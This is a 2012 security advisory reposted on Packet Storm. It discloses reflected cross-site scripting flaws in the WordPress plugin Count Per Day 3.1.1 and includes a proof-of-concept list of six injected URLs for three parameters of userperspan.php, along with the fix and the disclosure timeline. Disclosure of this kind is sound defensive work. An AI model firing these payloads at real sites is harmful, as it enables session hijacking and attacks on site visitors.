what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Count Per Day 3.1.1 Cross Site Scripting

WordPress Count Per Day 3.1.1 Cross Site Scripting
Posted Jul 17, 2012
Authored by Stefan Schurtz

WordPress plugin Count Per Day version 3.1.1 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 28361cdd395c57304d759e3a7c3969bfc5d760b11accedd798ecce30a9dacbee

WordPress Count Per Day 3.1.1 Cross Site Scripting

Change Mirror Download
Advisory: WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities
Advisory ID: SSCHADV2012-015
Author: Stefan Schurtz
Affected Software: Successfully tested on 'Count Per Day' 3.1.1
Vendor URL: http://www.tomsdimension.de/wp-plugins/count-per-day
Vendor Status: fixed

==========================
Vulnerability Description
==========================

The WordPress plugin 'Count Per Day' 3.1.1' is prone to multiple XSS vulnerabilities

==================
PoC-Exploit
==================

http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?page="/><script>alert(88)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?page="/><script>alert(/xss/)</script>

http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemin="/><script>alert(88)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemin="/><script>alert(/xss/)</script>

http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemax="/><script>alert(88)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemax="/><script>alert(/xss/)</script>

=========
Solution
=========

Upgrade to the latest version 3.2

====================
Disclosure Timeline
====================

29-Jun-2012 - vendor informed (contact form)
02-Jul-2012 - verified by Meistar
03-Jul-2012 - feedback from developer
14-Jul-2012 - fixed by developer

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://wordpress.org/extend/plugins/count-per-day/changelog/
http://www.darksecurity.de/advisories/2012/SSCHADV2012-015.txt
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close